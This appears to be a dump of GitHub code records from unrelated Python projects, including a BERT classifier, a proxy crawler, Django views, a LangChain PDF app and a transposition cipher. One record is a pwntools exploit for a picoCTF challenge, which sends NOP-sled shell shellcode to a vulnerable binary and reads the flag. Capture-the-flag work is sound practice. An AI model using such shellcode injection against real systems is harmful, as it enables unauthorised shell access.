pd.read_csv('IMEI.csv')\n\t\t\t\tsave_path=os.path.join(creat_file,\"result.csv\")\n\t\t\t\tprint(save_path)\n\t\t\t\tdistname=open(save_path,'w',newline ='') # newline='' avoids a blank line between saved rows\n\t\t\t\tidx_for_df1 = df1['imei'].isin(df2['imei'])\n\t\t\t\tprint(len(idx_for_df1))\n\t\t\t\tfor x in range(len(idx_for_df1)):\n\t\t\t\t\tif idx_for_df1[x]==True:\n\t\t\t\t\t\t#print(\"x:\" + str(x) +\" \"+ str(idx_for_df1[x]))\n\t\t\t\t\t\t#print(df1.iloc[x,:])\n\t\t\t\t\t\tmeta_10.append(df1.iloc[x,:]) # append rows matching the condition to the list\n\t\t\t\tpd_10=pd.DataFrame(meta_10) # convert the list to a DataFrame\n\t\t\t\tpd_10.to_csv(distname,index=None)\n\n\t\n\n\n\n\n\n\n","repo_name":"Wayne20200520/PythonProject","sub_path":"power/埋点处理脚本/提取指定IMEI号电流信息/power_log_collect.py","file_name":"power_log_collect.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"36972388495","text":"from telegram.client import Telegram\nfrom config import api_id, api_hash, phone, database_encryption_key, setting, proxy_server, proxy_port, proxy_type\n\ndef login():\n tg = Telegram(\n api_id=api_id,\n api_hash=api_hash,\n phone=phone,\n
database_encryption_key=database_encryption_key,\n proxy_server=proxy_server,\n proxy_port=proxy_port,\n proxy_type=proxy_type,\n )\n tg.login()\n\n return tg\n\ntg = login()\n","repo_name":"Yoo-4x/telegram_bot","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"21243764814","text":"from dataclasses import asdict\nfrom datetime import datetime\nfrom json import dump, JSONEncoder\nfrom pathlib import Path\nfrom typing import Any, Callable, TYPE_CHECKING\n\nfrom pydantic import parse_file_as\nfrom xdg import xdg_config_home\n\nfrom just_start_broker.persistence import ScheduleNotExpired, ScheduleNotFoundError\nfrom just_start_broker.schemas import Schedule\n\nif TYPE_CHECKING:\n from just_start_broker.app import ScheduleAccessor\n\n\ndef get_schedule_accessor(\n *, config_path: Path = xdg_config_home()\n) -> \"ScheduleAccessor\":\n return FileScheduleAccessor(config_path / \"just-start-broker\" / \"schedule.json\")\n\n\nclass ScheduleEncoder(JSONEncoder):\n def default(self, o: Any) -> Any:\n if isinstance(o, datetime):\n return str(o)\n return super().default(o)\n\n\nclass FileScheduleAccessor:\n def __init__(self, path: Path, get_now: Callable[[], datetime] = datetime.utcnow):\n self.path = path\n self.get_now = get_now\n\n def create(self, schedule: Schedule) -> None:\n raise_if_schedule_is_unexpired(self.read, self.get_now())\n self.path.parent.mkdir(exist_ok=True, parents=True)\n with open(self.path, \"w\") as f:\n dump(asdict(schedule), f, cls=ScheduleEncoder)\n\n def read(self) -> Schedule:\n try:\n return parse_file_as(Schedule, self.path)\n except FileNotFoundError as e:\n raise ScheduleNotFoundError from e\n\n\ndef raise_if_schedule_is_unexpired(\n read_schedule: Callable[[], Schedule], now: datetime\n) -> None:\n try:\n schedule = read_schedule()\n except ScheduleNotFoundError:\n pass\n else:\n if schedule.expiration > now:\n raise ScheduleNotExpired(schedule.expiration)\n","repo_name":"AliGhahraei/just-start-broker","sub_path":"just_start_broker/file_persistence.py","file_name":"file_persistence.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"30771909","text":"#!/bin/env python3\n# Helpers\n\nimport os, re, subprocess, atexit, code, readline\n\nfrom config import history_file\n\nclass GConsole( code.InteractiveConsole ):\n \"\"\"Interactive Console with history and emacs short-cuts\n\n This class modifies the InteractiveConsole class from the \"code\" module to\n support a history; the history file is typically located at the following path:\n ~/.config/G/history\n \"\"\"\n\n def __init__( self, locals = None, filename = \"<console>\",\n histfile = history_file() ):\n code.InteractiveConsole.__init__(self, locals, filename)\n self.init_history( histfile )\n def init_history( self, histfile ):\n readline.parse_and_bind( \"tab: complete\" )\n if hasattr( readline, \"read_history_file\" ):\n try:\n readline.read_history_file( histfile )\n except FileNotFoundError:\n pass\n atexit.register( self.save_history, histfile )\n def save_history( self, histfile ):\n readline.write_history_file( histfile )
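\n\n# A hedged usage sketch (added; not in the original file): GConsole is meant as a\n# drop-in replacement for code.interact(); interact() is inherited from\n# code.InteractiveConsole, and the history is loaded on start and written back at\n# exit via atexit:\n#\n# console = GConsole()\n# console.interact( \"Welcome to G\" )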
\ndef clean_history( history_file = history_file() ):\n previous_line = None\n clean_lines = []\n for line in sorted( open( history_file, \"r\" ) ):\n if not line == previous_line:\n clean_lines.append( line )\n previous_line = line\n # Clear the old history file\n with open( history_file, \"w\" ) as file:\n file.close()\n # Append only lines that differ from their previous line\n for line in clean_lines:\n with open( history_file, \"a\" ) as file:\n file.write( line )\n file.close()\n\ndef emend_path( path_to_emend ):\n \"\"\"This function converts a string to an OS independent path\"\"\"\n\n path = re.split( r\"[\\\\\\/]\", os.path.expanduser( path_to_emend ) )\n if re.match( r\"([\\/\\\\]|[^~])\", path_to_emend[0:1] ):\n path.insert( 0, os.sep ) # list.insert() returns None, so insert first and join below (the original returned the None)\n return os.path.join( *path )\n else:\n return os.getcwd() + os.sep + os.path.join( *path )\n\ndef is_path( possible_path ):\n \"\"\"Returns True when the possible_path is a valid path (POSIX/Windows)\n\n Arguments:\n possible_path: A string which should be checked if it is a valid path\n \"\"\"\n\n if re.match( r\"^(([A-Z]\\:\\\\\\\\)|([\\/\\\\]*[\\w]+))([\\\\\\/]*[\\w\\-\\.]*)*$\",\n os.path.expanduser( possible_path ) ):\n return True\n else:\n return False\n\ndef is_variable( possible_variable ):\n \"\"\"Returns True when the possible_variable is a \"G\" variable\n\n In \"G\" syntax a variable is escaped by a \"@\" (i.e. @name_of_branch)\n This function checks the argument \"possible_variable\" for exactly this syntax.\n\n Arguments:\n possible_variable: A string which should be checked for the branch-syntax of \"G\"\n \"\"\"\n\n if re.match( r\"^\\@[\\w\\-\\.\\/]*$\", possible_variable ):\n return True\n else:\n return False\n\ndef is_repository( possible_repository = os.getcwd() ):\n for file in os.listdir( possible_repository ):\n if file == \".git\":\n return True\n return False\n\ndef is_empty( element ):\n return len( element ) == 0\n\ndef git( cmd, operand = None ):\n \"\"\"Start a git command as a subprocess\n\n Arguments:\n cmd: The git command that should be executed. 
This argument must be one\n of the following: \"push\", \"pull\", \"merge\", \"add\", \"reset\"\n operand: Contains the files or branches that need to be processed.\n \"\"\"\n\n try:\n if not operand:\n subprocess.check_call( [ \"git\", cmd ] )\n elif type( operand ) == str:\n subprocess.check_call( [ \"git\", cmd ] + operand.split() )\n else:\n subprocess.check_call( [ \"git\", cmd ] + operand )\n except OSError:\n error( \"Git needs to be installed to properly use G\" )\n\ndef get_current_branch():\n current_branch = subprocess.check_output( \"git rev-parse --abbrev-ref HEAD\".split() )\n # Convert the byte-string to utf-8\n current_branch = current_branch.decode( \"utf-8\" )\n # Return the current branch without the newline character (\"\\n\")\n return current_branch[:-1]\n","repo_name":"kokakolako/G","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"20673210368","text":"# https://www.kaggle.com/code/nayansakhiya/text-classification-using-bert/notebook\n# https://zhuanlan.zhihu.com/p/35866604 -> attempt to work around OOM\n# import tokenization\nfrom bert.tokenization import bert_tokenization\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom tensorflow.keras.losses import BinaryFocalCrossentropy\nfrom tensorflow.keras.layers import LeakyReLU\nfrom keras.utils import to_categorical\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\nfrom keras.models import load_model\nimport tensorflow_text as text\nimport time\nimport yaml\nimport sys # missing in the original, but needed by the debug exits below\n\n\nclass DataManager():\n def __init__(self, data_name, df):\n self.data_name = data_name\n self.df = df\n\n def get_df(self):\n self.df['content'] = self.df['content'].str.lower()\n return self.df # return the instance's dataframe (the original returned the global df)\n\n# Build The Model\ndef build_model(bert_layer, preprocessor, labels_number, max_len=128):\n text_input = tf.keras.layers.Input(shape=(), dtype=tf.string, name='text')\n preprocessed_text = preprocessor(text_input)\n outputs = bert_layer(preprocessed_text)\n\n # outputs['pooled_output'], outputs['sequence_output']\n \n # clf_output = outputs['sequence_output'][:, 0, :]\n clf_output = outputs['pooled_output']\n \n lay = tf.keras.layers.Dense(64, activation='relu')(clf_output)\n lay = tf.keras.layers.Dropout(0.2)(lay)\n out = tf.keras.layers.Dense(labels_number, activation='sigmoid')(lay)\n # out = tf.keras.layers.Dense(labels_number, activation='softmax')(lay)\n \n model = tf.keras.models.Model(inputs=[text_input], outputs=out)\n # model.compile(tf.keras.optimizers.Adam(lr=2e-5), loss='categorical_crossentropy', metrics=['accuracy'])\n model.compile(tf.keras.optimizers.Adam(lr=2e-5), loss='binary_crossentropy', metrics=['accuracy'])\n \n return model
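\n\n# Hedged aside (added; not in the original script): with a sigmoid head and\n# binary_crossentropy the output labels are treated as independent (multi-label);\n# for mutually exclusive classes the commented-out softmax/categorical_crossentropy\n# pair is the usual choice. A minimal smoke test, assuming the hub layers built in\n# the main block below:\n#\n# model = build_model(bert_layer, preprocessor, labels_number=3)\n# model.predict(tf.constant(['some text'])) # -> shape (1, 3) scores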
\n\n\nif __name__ == \"__main__\":\n\n data_name = '20230724-V1-云南省昆明市西山区昆州路'\n\n df = pd.read_csv('./data/' + data_name + '.csv', encoding='utf-8')\n dataManager = DataManager(data_name, df)\n\n\n df = dataManager.get_df()\n\n train_data, test_data = train_test_split(df, test_size=0.2)\n\n # Label encoding of labels\n label = preprocessing.LabelEncoder()\n y = label.fit_transform(train_data['label'])\n y = to_categorical(y)\n\n\n print(type(y[0][0]))\n # sys.exit(0) # leftover debug exit, commented out so the script can run to the end\n\n # convert the input to lower case\n train_data['content'] = train_data['content'].str.lower()\n\n # Chinese version\n bert_url = './model/distilbert_multi_cased_L-6_H-768_A-12_1'\n bert_layer = hub.KerasLayer(bert_url, trainable=True)\n\n preprocess_url = './model/distilbert_multi_cased_preprocess_2'\n preprocessor = hub.KerasLayer(preprocess_url)\n\n train_labels = y\n labels = label.classes_\n\n print(train_labels[0])\n # sys.exit(0) # leftover debug exit, commented out\n\n max_len = 128\n\n model = build_model(bert_layer, preprocessor, len(labels), max_len=max_len)\n model.summary()\n\n epochs = 20\n model_name = '20230725-V1-hospital_bert_model_epoch' + str(epochs)\n\n # Run the model\n checkpoint = tf.keras.callbacks.ModelCheckpoint('./save_model/' + model_name + '.h5', monitor='val_accuracy', save_best_only=True, verbose=1)\n earlystopping = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, verbose=1)\n # earlystopping = tf.keras.callbacks.EarlyStopping(monitor='val_accuracy', patience=5, verbose=1)\n\n train_sh = model.fit(\n train_data.content.values, train_labels,\n validation_split=0.2,\n epochs=epochs,\n callbacks=[checkpoint, earlystopping],\n batch_size=16,\n verbose=1\n )\n\n\n model.save('./save_model/' + model_name + '.h5')\n\n","repo_name":"Sombcholic/tf2_public","sub_path":"DistilBERT/main_hospital.py","file_name":"main_hospital.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"11915915369","text":"from lxml import etree\nfrom utils import get_page\nimport time\n\n\n# Metaclass\nclass ProxyMetaclass(type):\n def __new__(mcs, name, bases, attrs):\n count = 0\n attrs['__CrawlFunc__'] = []\n for k, v in attrs.items():\n # any attribute whose name contains 'crawl_'\n # is registered as a crawler function\n if 'crawl_' in k:\n attrs['__CrawlFunc__'].append(k)\n count += 1\n attrs['__CrawlFuncCount__'] = count\n return type.__new__(mcs, name, bases, attrs)\n\n\nclass Crawler(metaclass=ProxyMetaclass):\n def get_proxies(self, callback):\n proxies = []\n for proxy in eval(\"self.{0}()\".format(callback)):\n print('Got proxy', proxy)\n proxies.append(proxy)\n return proxies\n\n def crawl_daili66(self, page_count=4):\n start_url = 'http://www.66ip.cn/{0}.html'\n urls = [start_url.format(page) for page in range(1, page_count + 1)]\n for url in urls:\n html = get_page(url)\n if html:\n selector = etree.HTML(html)\n trs = selector.xpath('.//div[@id=\"main\"]/div[1]/div[1]/table/tr')\n for i in range(1, len(trs)):\n ip = trs[i].xpath('.//td[1]/text()')[0]\n port = trs[i].xpath('.//td[2]/text()')[0]\n yield ':'.join([ip, port])\n\n def crawl_ip3366(self, page_count=4):\n start_url = 'http://www.ip3366.net/free/?stype=1&page={0}'\n urls = [start_url.format(page) for page in range(1, page_count + 1)]\n for url in urls:\n html = get_page(url)\n if html:\n selector = etree.HTML(html)\n table = selector.xpath('.//div[@id=\"list\"]/table')[0]\n trs = table.xpath('.//tr')\n for i in range(1, len(trs)):\n ip = trs[i].xpath('.//td[1]/text()')[0]\n port = trs[i].xpath('.//td[2]/text()')[0]\n yield ':'.join([ip, port])\n\n def crawl_kuaidaili(self, page_count=4):\n start_url = 'http://www.kuaidaili.com/free/inha/{0}/'\n urls = [start_url.format(page) for page in range(1, page_count + 1)]\n for url in urls:\n html = get_page(url)\n if html:\n selector = etree.HTML(html)\n table = selector.xpath('.//div[@id=\"list\"]/table')[0]\n trs = table.xpath('.//tr')\n for i in range(1, len(trs)):\n ip = trs[i].xpath('.//td[1]/text()')[0]\n port = trs[i].xpath('.//td[2]/text()')[0]\n yield ':'.join([ip, port])\n time.sleep(1)
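\n\n # A hedged usage sketch (added; not in the original file): ProxyMetaclass registers\n # every method whose name contains 'crawl_' in __CrawlFunc__, so all proxy sources\n # can be driven generically:\n #\n # crawler = Crawler()\n # for func_name in crawler.__CrawlFunc__:\n # proxies = crawler.get_proxies(func_name)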
\n\n def crawl_xicidaili(self, page_count=4):\n start_url = 'http://www.xicidaili.com/nn/{0}'\n urls = [start_url.format(page) for page in range(1, page_count + 1)]\n for url in urls:\n html = get_page(url)\n if html:\n selector = etree.HTML(html)\n trs = selector.xpath('.//table[@id=\"ip_list\"]/tr')\n for i in range(1, len(trs)):\n ip = trs[i].xpath('.//td[2]/text()')[0]\n port = trs[i].xpath('.//td[3]/text()')[0]\n yield ':'.join([ip, port])\n\n\nif __name__ == '__main__':\n crawler = Crawler()\n","repo_name":"lssxfy123/PythonStudy","sub_path":"proxy_test/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"75062155043","text":"\nfrom django.shortcuts import render\nfrom django.template.loader import render_to_string\nfrom django.http import HttpResponseBadRequest # added for the error response in DashboardElement\nimport requests\nimport json\nimport ast\nimport urllib\nfrom collections import Counter\nfrom front.common import authetication_required\nimport configparser\nparser = configparser.RawConfigParser()\nparser.read('/opt/optima/global_configuration/optima_configuration_file.cnf')\nAPI_URI = 'http://{0}:{1}'.format(parser.get('API_SECTION', 'API_HOST'),\n parser.get('API_SECTION', 'API_PORT'))\n\nELEMENT_TYPE_MAPPING = {\"echart\":\"echart.html\",\n \"donut\":\"donut.html\",\n \"top\":\"top.html\",\n \"bar\":\"bar.html\",\n \"doughnut\": \"doughnut.html\",\n }\n\ndef formatValues(rows, dashboardElementType):\n if dashboardElementType == 'echart':\n rows.reverse()\n names = [row[\"name\"] for row in rows]\n series = []\n if rows != []:\n keys = list(rows[0].keys())\n keys.remove('name')\n else : keys = []\n for k in keys:\n serie = {\"name\":k, 'data':[]}\n for row in rows:\n serie['data'].append(row[k])\n series.append(serie)\n return {\"names\":names, \"series\":series}\n elif dashboardElementType == 'top':\n i = 1\n for value in rows:\n row = {\"row\": i}\n value.update(row)\n i=i+1\n return rows\n else:\n return rows
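\n\n# A worked illustration of the 'echart' branch (added for clarity; not in the original file):\n#\n# rows = [{'name': 'jan', 'in': 3, 'out': 1}, {'name': 'feb', 'in': 5, 'out': 2}]\n# formatValues(rows, 'echart')\n# # -> {'names': ['feb', 'jan'],\n# # 'series': [{'name': 'in', 'data': [5, 3]}, {'name': 'out', 'data': [2, 1]}]}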
\n\n@authetication_required()\ndef Dashboard(request):\n if(request.POST.get('logout')):\n del request.session['jwt_token'] \n return render(request, 'login.html')\n headers = {'Authorization' : 'JWT {0}'.format(request.session.get('jwt_token'))}\n statisticsResponse = requests.get(API_URI + '/dashboardElement/statistics', headers=headers)\n statistics = statisticsResponse.json()\n for k,v in statistics['data'][0].items():\n if isinstance(v, int): statistics['data'][0][k] = str(v)\n if isinstance(v, float): statistics['data'][0][k] = '{:.2f}'.format(v)\n dashboards = requests.get(API_URI + '/dashboard/3', headers=headers)\n elementsHtml = []\n for element in dashboards.json()[\"dashboardElements\"]:\n elmnt = requests.get(API_URI + '/dashboardElement/{0}'.format(element), headers=headers)\n elementJson = elmnt.json()\n template = ELEMENT_TYPE_MAPPING.get(elementJson[\"type\"])\n if not template: raise Exception('Template ' + elementJson[\"type\"] + ' not found.') \n values = elementJson[\"data\"]\n\n formattedValues = formatValues(values, elementJson[\"type\"])\n html = render_to_string(template, {'values': formattedValues,\n 'name': element,\n 'description':elementJson['description'],\n })\n elementsHtml.append({\"html\": html, \"id\": element})\n return render(request, 'dashboard.html', {'dashboardElements': elementsHtml,\n 'statistics': statistics,\n })\n\ndef DashboardElement(request): \n id_ = request.GET.get('id')\n if not id_: return HttpResponseBadRequest('OOPS') # a Django view must return an HttpResponse; the original returned the tuple ('OOPS', 400)\n headers = {'Authorization' : 'JWT {0}'.format(request.session.get('jwt_token'))}\n elmnt = requests.get(API_URI + '/dashboardElement/{0}'.format(id_), headers=headers)\n elementJson = elmnt.json()\n template = ELEMENT_TYPE_MAPPING.get(elementJson[\"type\"])\n if not template: raise Exception('Template ' + elementJson[\"type\"] + ' not found.') \n values = elementJson[\"data\"]\n formattedValues = formatValues(values, elementJson[\"type\"])\n return render(request, template, {'values': formattedValues,\n 'name': id_,\n 'description':elementJson['description'],\n })\n# Create your views here.\n","repo_name":"kdfwow64/python-cors-again","sub_path":"frontend/front/dashboards/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73714216806","text":"import os\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\n\nimport sys\n\n\n\ndef save_all_lyrics(url, directory):\n \"\"\"\n Download each song lyrics from every lyric html page from the artist page.\n\n Parameters\n ----------\n url = url link of the artist page\n directory = directory where you want to save all the file\n both parameters need to be strings\n\n Returns\n -------\n download song files into chosen directory.\n\n \"\"\"\n #DOWNLOAD ARTIST URL AS TEXT FILE\n request = requests.get(url) # Send the request\n with open(str(url.split('/')[-2]) + '.txt', 'w') as file: # Save the html in a txt file and search in an editor\n file.write(request.text)\n\n #CREATE BEAUTIFULSOUP FOR PARSING AND SELECTING LYRIC LINKS\n text = request.text # Get downloaded text file from original url\n artist_soup = BeautifulSoup(text, 'html.parser') #Use beautifulsoup for parsing\n\n\n #LOOP FOR ADDING ALL LYRIC LINKS INTO A LIST\n links = [] # Create list with links\n for td in artist_soup.find_all('td'):\n if \"tal\" in td.get('class',[]): # selection according to parsing\n links.append('https://www.lyrics.com' + td.find('a')['href']) # append each link into the list with complete url\n\n #LOOP TO CREATE LYRIC TEXT FILES FOR EACH LYRIC LINK\n for i in range(len(links)):\n temp_url = links[i] # create a temporary link for each entry in the links list\n title = temp_url.split('/')[-1] # create the title based on the temp lyric url\n\n temp_req = requests.get(temp_url) # request each temp lyric link\n\n with open(directory + title + '.txt', 'w') as file:\n soup_artist = BeautifulSoup(temp_req.text, 'html.parser') # create a soup out of each lyric page (parser added; the original omitted it and triggered a bs4 warning)\n lyrics = soup_artist.pre.get_text() # get only the lyrics text\n file.writelines(lyrics)\n","repo_name":"brauliotegui/SPICED","sub_path":"Week_04/download_songs.py","file_name":"download_songs.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"25380767209","text":"import os\nfrom dotenv import load_dotenv\nload_dotenv()\n\nimport openai\nimport streamlit as st\nfrom PyPDF2 import PdfReader\nfrom io import StringIO\n\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.vectorstores import FAISS\n\nfrom langchain.chains.question_answering import load_qa_chain\n\nfrom langchain.llms import OpenAI\n\nllm = OpenAI(temperature=0.7,model_name='gpt-3.5-turbo')\n\nOPENAI_API_KEY = os.getenv(\"OPENAI_API_KEY\")\n\n\ndef main():\n st.title(\"PDF to Text\")\n st.header(\"Upload a PDF file and ask any question about it.\")\n\n pdf = st.file_uploader(\"Upload a PDF file\", type=[\"pdf\"], accept_multiple_files=False)\n \n if pdf is not None:\n pdf_reader = PdfReader(pdf)\n text = \"\"\n for page in pdf_reader.pages:\n text += page.extract_text()
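\n # Note added for clarity (not in the original): chunk_size=1000 with\n # chunk_overlap=200 below makes consecutive chunks share about 200 characters,\n # so an answer that straddles a chunk boundary is less likely to be cut off.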
separator='\\n',\n chunk_size=1000,\n chunk_overlap=200,\n length_function=len\n )\n chunks = text_splitter.split_text(text)\n st.write(\"PDF file uploaded successfully\")\n\n # we will create embeddings for each chunk\n\n embadding = OpenAIEmbeddings()\n knowledge_base = FAISS.from_texts(chunks, embadding)\n st.write(\"Embeddings created successfully\")\n query = st.text_input(\"Ask a question about the PDF file\")\n if query:\n st.write(\"Searching for the answer...\")\n docs = knowledge_base.similarity_search(query)\n # st.write(result)\n chain = load_qa_chain(llm,chain_type='stuff')\n response = chain.run(input_documents=docs, question=query)\n st.write(response)\n\n\n else:\n st.write(\"Please upload a PDF file\")\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"kamalchibrani-ai/langchain_tinkering","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73947744804","text":"from gather.consts import Formats, SourceTypes\n'''\nСписок опрашиваемых модулей\nid->str: для идентификации\ntype->str: тип устройства, реализовано: SourceTypes.MODBUS_TCP\nip->str: ip источника\nport->int: порт источника\nunit->int: номер устройства (в ТСР обычно 1, если ТСР конвертер в 485 - номер в 485-й сети)\naddr_pool: раздел таблицы адресов из consts.Formats CO | DI | HR | IR\naddress->int: начальный адрес чтения данных\ncount->int: кол-во последовательных адресов для чтения\nperiod->float: период опроса в сек\n'''\nmodule_list = [\n {'type': SourceTypes.MODBUS_TCP, 'ip': '172.19.10.7', 'port': 502, 'unit': 0x1,\n 'addr_pool': Formats.IR, 'address': 0, 'count': 1, 'period': 0.5},\n {'type': SourceTypes.MODBUS_TCP, 'ip': '172.19.10.7', 'port': 502, 'unit': 0x1,\n 'addr_pool': Formats.DI, 'address': 0, 'count': 8, 'period': 0.5},\n]\n\n\nmodbus_server_1 = {'host': '127.0.0.1', 'port': 510}\nmodbus_server_2 = {'host': '127.0.0.1', 'port': 511}\n\nPOLL_PERIOD = 0.5\n","repo_name":"IgorVDubov/mbsplitter","sub_path":"modbusconfig.py","file_name":"modbusconfig.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13425683689","text":"#!/usr/local/bin/python3\nwith open(\"input.txt\", \"r\") as f:\n data = f.read()\n\nmesLen = len(data)\n\ndef elfFunction(m):\n n=m-1\n for i in range(n, (mesLen-1)):\n test = data[(i-n):(i+1)]\n lets = []\n for j in range(m):\n lets.append(test[j])\n letSet = set(lets)\n if (len(letSet)==m):\n print(i+1, letSet)\n break\n\nelfFunction(4) # part1\nelfFunction(14) # part2","repo_name":"nickcowans/adventofcode","sub_path":"2022/Day_06/day-06.py","file_name":"day-06.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5815143847","text":"class Solution(object):\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n #The idea is simply. The product basically is calculated using the numbers before the current number and the numbers after the current number. Thus, we can scan the array twice. First, we calcuate the running product of the part before the current number. 
\n p = 1\n n = len(nums)\n res = []\n for i in range(n):\n res.append(p)\n p *= nums[i]\n p = 1\n for i in reversed(range(n)):\n res[i] *= p\n p *= nums[i]\n return res\n \n \n \n","repo_name":"shaniavina/Leetcode_Python","sub_path":"product_of_array_except_self.py","file_name":"product_of_array_except_self.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10028625166","text":"from pwn import *\nimport sys\n\nargv = sys.argv\n\nDEBUG = True\nBINARY = './vuln'\n\ncontext.binary = BINARY\ncontext.terminal = ['tmux', 'splitw', '-v']\n\ndef attach_gdb():\n gdb.attach(sh)\n\n\nif DEBUG:\n context.log_level = 'debug'\n\nif len(argv) < 2:\n stdout = process.PTY\n stdin = process.PTY\n\n sh = process(BINARY, stdout=stdout, stdin=stdin)\n\n # if DEBUG:\n # attach_gdb()\n\n REMOTE = False\nelse:\n s = ssh(host='2019shell1.picoctf.com', user='sashackers', password=\"XXX\")\n sh = s.process('/problems/slippery-shellcode_1_69e5bb04445e336005697361e4c2deb0/vuln')\n REMOTE = True\n\n\nsh.sendlineafter(':\\\\n', '\\\\x90'*256+asm(shellcraft.i386.linux.sh()))\nsh.sendlineafter('$ ', 'cat /problems/slippery-shellcode_1_69e5bb04445e336005697361e4c2deb0/flag.txt')\nsh.interactive()\n","repo_name":"tcode2k16/blog","sub_path":"static/picoctf-2019-writeup/binary-exploitation/slippery-shellcode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39908766056","text":"\r\n# ----------------------Transposition Cipher----------------------\r\n\r\ndef encryptTranspositionCipher(text, key):\r\n ourArr = list(text)\r\n ourArr = [ourArr[index:index + key] for index in range(0, len(ourArr), key)]\r\n string = \"\"\r\n scrambledArr = []\r\n elementExistence = 0\r\n arrElemC = 0\r\n\r\n while arrElemC < len(ourArr[0]):\r\n for i in range(0, len(ourArr)):\r\n if elementExistence < len(ourArr[i]):\r\n string += ourArr[i][elementExistence]\r\n\r\n scrambledArr.append(string)\r\n string = \"\"\r\n arrElemC += 1\r\n elementExistence += 1\r\n\r\n return \"\".join(scrambledArr)\r\n\r\n\r\ndef decryptTranspositionCipher(text, key):\r\n ourArr = list(text)\r\n q, r = divmod(len(ourArr), key)\r\n slicedArr = list((ourArr[index * q + min(index, r):(index + 1) * q + min(index + 1, r)] for index in range(key)))\r\n\r\n string = \"\"\r\n elementExistence = 0\r\n arrElemC = 0\r\n decryptedArr = []\r\n while arrElemC < len(slicedArr[0]):\r\n for i in range(0, len(slicedArr)):\r\n if elementExistence < len(slicedArr[i]):\r\n string += slicedArr[i][elementExistence]\r\n\r\n decryptedArr.append(string)\r\n string = \"\"\r\n arrElemC += 1\r\n elementExistence += 1\r\n\r\n return \"\".join(decryptedArr)\r\n
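\r\n# A hedged round-trip check (added; not in the original file):\r\n#\r\n# ct = encryptTranspositionCipher(\"attackatdawn\", 4) # -> \"acdtkatawatn\"\r\n# decryptTranspositionCipher(ct, 4) # -> \"attackatdawn\" (length divisible by key)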
","repo_name":"nickgabriadze/ciphers","sub_path":"TranspositionCipher.py","file_name":"TranspositionCipher.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74826523364","text":"# Rock Paper Scissors Game\nimport random # Imports the random module, ignore for now\n\ndef LineBreak():\n print(\"\\n---------------------\\n\") # Creates a function that puts a line break in to make the code look a bit neater\n\n# Attempt at making an AI player\ndef UserInput(bAI, sPlayer1Name, sPlayer2Name):\n if bAI == True: # If the player wants to play against an AI, do this\n sOptions = [\"rock\", \"paper\", \"scissors\"] # Puts the options into a list\n iAIInput = random.randint(0,2) # Generate a random number between 0 and 2\n sPlayer2Input = sOptions[iAIInput] # Get the option from that position in the list\n sPlayer1Input = input(sPlayer1Name + \"\"\", please enter either Rock, Paper or Scissors\n--> \"\"\")\n sPlayer1Input = sPlayer1Input.lower() # Changes sPlayer1Input to be all lower case\n print(sPlayer2Name + \" picked \" + sPlayer2Input) # Print what the AI picked\n return sPlayer1Input, sPlayer2Input\n\n elif bAI != True:\n sPlayer1Input = input(sPlayer1Name + \"\"\", please enter either Rock, Paper or Scissors\n--> \"\"\")\n sPlayer1Input = sPlayer1Input.lower() # Changes sPlayer1Input to be all lower case\n sPlayer2Input = input(sPlayer2Name + \"\"\", please enter either Rock, Paper or Scissors\n--> \"\"\")\n sPlayer2Input = sPlayer2Input.lower() # Changes sPlayer2Input to be all lower case\n return sPlayer1Input, sPlayer2Input\n\ndef RockPaperScissorsWinConditions(sPlayer1Input, sPlayer2Input, sPlayer1Name, sPlayer2Name, iPlayer1Score, iPlayer2Score):\n\n # The win conditions for the game, calculating who won and printing the winner\n if sPlayer1Input == \"rock\" and sPlayer2Input == \"scissors\": \n print(sPlayer1Name + \" Wins!\\n\")\n iPlayer1Score += 1\n elif sPlayer1Input == \"paper\" and sPlayer2Input == \"rock\":\n print(sPlayer1Name + \" Wins!\\n\")\n iPlayer1Score += 1\n elif sPlayer1Input == \"scissors\" and sPlayer2Input == \"paper\":\n print(sPlayer1Name + \" 